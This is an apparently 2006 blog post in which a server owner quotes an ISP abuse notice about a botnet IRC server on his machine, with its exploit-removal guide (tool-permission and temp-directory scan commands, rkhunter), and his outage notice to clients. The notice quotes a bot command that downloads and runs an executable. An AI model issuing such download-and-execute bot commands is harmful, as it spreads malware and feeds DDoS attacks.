header

Root (wute) Kit

Yea, so I received this e-mail from my ISP:

Subject: Policy Enforcement of LTSV-## at {my IP} for IRC Malicious

NOTES: Remove the IRCd software from this server. It is being used for malicious intent.
QUOTE FROM THE
Axxx has changed the topic on channel #lucky to “.dl http://(url)/a.goud5/install.exe a.exe 1 -s”
.l ………. -s
.q

NOTES: I have added an Exploit Removal Guide below my signature block. This will help search for commonw exploits.

Dear Client,

This is a Policy Enforcement Notice that your server has violated our Acceptable Use Policy available at http://www.layeredtech.com/aup.shtml. Please refer to the attached complaints and/or logs of abuse. If you believe we have traced this issue to you erroneously, our staff will investigate the issue further.

IT IS YOUR RESPONSIBILITY TO REMOVE ALL DOMAINS, USERS, AND CONTENT CAUSING THIS ABUSE ISSUE AND TO INVESTIGATE ANY MISCONFIGURED, INFECTED, OR UNAUTHORIZED USE OF SOFTWARE.

PENDING YOUR REQUIRED REPLY WITH YOUR COMMENTS, QUESTIONS, OR ACTIONS TO RESOLVE THIS ISSUE, THE SERVER IS:

[] Monitored for Additional Violations
[] Accessed for Investigation, Cleaning, Hardening, or Securing
[x] Disconnected in: [] 24-Hours [x] 12-Hours [] 6-Hours [] 1-Hour [] 0-Hours
[] Required Reload Request with: [] New Client Required [] No Data Recovery [] Data Recovery Allowed
at http://support.layeredtech.com under “Open a Ticket”
[] Hard Drives Seized for Investigation
[] Null-Routed
[] Port Shutdown
[] On 30-Day Probation
[] Reviewed for Possible Cancellation
[] Cancelled

FOR THE FOLLOWING REASONS:

[] Child Porn C Hosting, Distributing, or Linking to Pornography Involving a Person Under Legal Age
[] Copyright L Hosting, Distributing, or Linking to Copyright Infringed Materials
[] Cracking H Brute Force Access of Secured Network Devices
[] DoS H Denial of Service Attack of Network Devices
[] Forgery M Faking an IP Address, Hostname, E-Mail Address, or Header
[] Fraud Site H Hosting or Linking to a Website Intended to Deceive the Public
[] Hacking H Circumventing Security Systems of Network Devices
[] HYIP Site M Hosting or Linking to a Website of High Yield Investment Program, Ponzi Scheme, or Pyramid Scheme
[] ID Theft H Hosting, Distributing, or Linking to Stolen Account Identification Information
[] Infection H Hosting, Distributing, or Linking to Exploits, Trojans, Viruses, or Worms
[x] IRC Malicious M Malicious Use of Internet Relay Chat
[] IRC Unregistered L Internet Relay Chat Server not Registerd with Layered Technologies
[] Phishing H Identity Theft by Email Under False Pretense
[] ROKSO Spamhaus C ROKSO Blacklisting of an IP at www.spamhaus.org for Malicious Activity
[] Scanning H Probing for Vulnerabilities of Network Devices
[] Shells H Hosting Accounts Primarily for Shell Access
[] Spam Cannon E Sending High Volume Spam (UCE or UBE)
[] Spam Email L Unsolicited Commercial Email (UCE) or Unsolicited Bulk Email (UBE)
[] Spam List M Hosting, Distributing, or Linking to Email Address Lists for Spam
[] Spam Proxy C Hosting an Open Proxy Server Used for Spam
[] Spam Relay C Hosting an Open Mail Rely Used for Spam
[] Spam Hijack C Distributing Spam Through a Third Party Server Vulnerability
[] Spam Site L A Site Advertised by Spam Email or Spam Web
[] Spam Ware H Hosting, Distributing, or Linking to Software Designed for Spamming
[] Spam Web L Unsolicited, Bulk, or Forged Site Advertisement in Web Logs, Forums, or Guestbooks
[] Terrorist Site C Hosting or Linking to a Site Advocating Terrorism
[] Toolz L Hosting, Distributing, or Linking to Cracking, DoS, Forgery, Infection, or Scanning Software or Instruction
[] Trademark L Hosting, Distributing, or Linking to Trade Mark Infringed Materials
[] Warez L Hosting, Distributing, or Linking to Crackz, Hackz, KeyGenz, Serialz, or Pirated Software

[] OTHER:

Thank you for your cooperation,

Layered Technologies Abuse Team

On Thu, 02 Mar 2006 13:01:42 -0600, pen@ev6.net wrote:

>> hello,
>>
>> recently stumbled onto a drone ircd on your network, {my IP}:8080,
>> channel #lucky.
>>
>> i was going to contact the customer directly but thier whois info
>> provides no abuse contact or any other usable contact.
>>
>> please null route this ip immediately. the bots on this server are being
>> used to DDoS a customer of ours..
>>
>>
>> thanks,
>> jl, ev6 networks.

Thank you,

Tom
Layered Technologies
Policy Enforcement Technician

ACCEPTABLE USE POLICY at http://layeredtech.com/aup.shtml

### Exploit Removal Guide ###

The following is a first step in finding and removing exploits and root kits on a Linux or BSD system.

1. EXECUTE THE FOLLOWING COMMANDS TO HELP PREVENT UPLOADS OF EXPLOITS:

chmod 0750 `which curl` 2>&-; chmod 0750 `which fetch` 2>&-; chmod 0750 `which wget` 2>&-

2. EXECUTE THE FOLLOWING COMMANDS TO CHECK FOR POSSIBLE EXISTING EXPLOITS:

sh
for x in “/dev/shm /tmp /usr/local/apache/proxy /var/spool /var/tmp”; do ls -loAFR $x 2>&- | grep -E “^$|^/| apache | nobody | unknown | www | web ” | grep -E “^$|^/|/$|\*$|\.pl$” | tee exploits.txt; done; echo -e “\n\nPossible Exploit Files and Directories: `grep -Ev “^$|^/” exploits.txt | wc -l | tr -d ‘ ‘`” | tee -a exploits.txt
exit

Lines ending with an asterisk ‘*’, ‘.pl’, or a slash ‘/’ are possible exploit files or directories which should be investigated and removed followed by rebooting the server to kill any running exploit processes. You can refer to the exploits.txt file generated by the above commands for later reference.

3. You should also install and run the progam called rkhunter.

Rootkit Hunter is scanning tool to ensure you for about 99.9% you’re clean of nasty tools.

This tool scans for rootkits, backdoors and local exploits by running tests like:

– MD5/SHA1 hash compare
– Look for default files used by rootkits
– Wrong file permissions for binaries
– Look for suspected strings in LKM and KLD modules
– Look for hidden files
– Optional scan within plaintext and binary files

WWW: http://www.rootkit.nl/

On BSD sytems:
cd /usr/ports/security/rkhunter; make install clean; rehash; rkhunter -c
(or for help with rkhunter arguments do: rkhunter -h)

On RedHat, Fedora, CentOS systems:
yum -y install rkhunter; rkhunter -c
(or for help with rkhunter arguments do: rkhunter -h)

If you cannot do this, our staff will clean, harden, and secure the server for you for a fee or or you can have a 3rd party company to do it.

If you cannot secure your server, you should issue a Reload Request of your system at http://support.layeredtech.com under “Open A Ticket”.

And the Rootkit Hunter didn’t find any rootkits… unfortunately. So, it’s time to do a system refresh. I sent this e-mail to the owners of the domains that I host:

Dear “clients”:

The server, nooblet.us which hosts your domain(s), files or e-mails nicely acquired a rootkit today (http://en.wikipedia.org/wiki/Rootkit). I was unable to find out what caused it, or even where it resides, so my ISP strongly recommends I do an OS reload (very soon). I will being the OS reload on Friday, March 2nd, 2006 (tomorrow), at approximately 2 p.m. PST.

I have installed lots of software on this server, so it might take me awhile to get it all caught up and reinstalled. Hopefully I can get it completed within 1 day. During this time, your mail, files, and everything else associated with your domains will not be available.
Also, it has come to my attention that too many of you have ssh access. This is essentially what caused the problem. Unless you make a deal with me to pay for some of the cost of the server, ssh access will be limited to me alone, you will instead only have ftp access to write files to the server. If you need ssh access, send me a message after I restore the server and we can negotiate a price.

The information that *will not* be lost during the server move includes:
1. Files. I have backed up all of the files for your domain and will restore it as soon as I can. My home system has a 30KB/s upload limit, so it might take awhile.
2. Domain Configuration. I have backed up the “named” files, so restoring this information should be the first to be done.

The information that *will* be lost during the server move includes:
1. E-mail accounts. This includes both the e-mails themselves and the login/password information. If you want to backup your e-mails, I’d suggest you do that as soon as possible, because it WILL be gone on Friday.
2. Username/password pair combinations. Your login will be lost. I will provide you with your username and a dummy password when the server is restored.

My e-mail {} will be down during the transition, so you can e-mail RnospamDEHLER(at)gmail.com in the meantime with questions or comments.

Sorry for the inconvenience, but really I’m just as inconvenienced as you, if not more.

Please send me your non-nooblet.us hosted e-mail to RnospamDEHLER(at)gmail.com and I can provide you with updates as they come.

Bummer, eh?

Comments (2)

Vigenere Cipher

I completed a Veginere Cipher in C++; as guided from this site.

My code for the vigenere cipher.

Comments (0)


blogtimes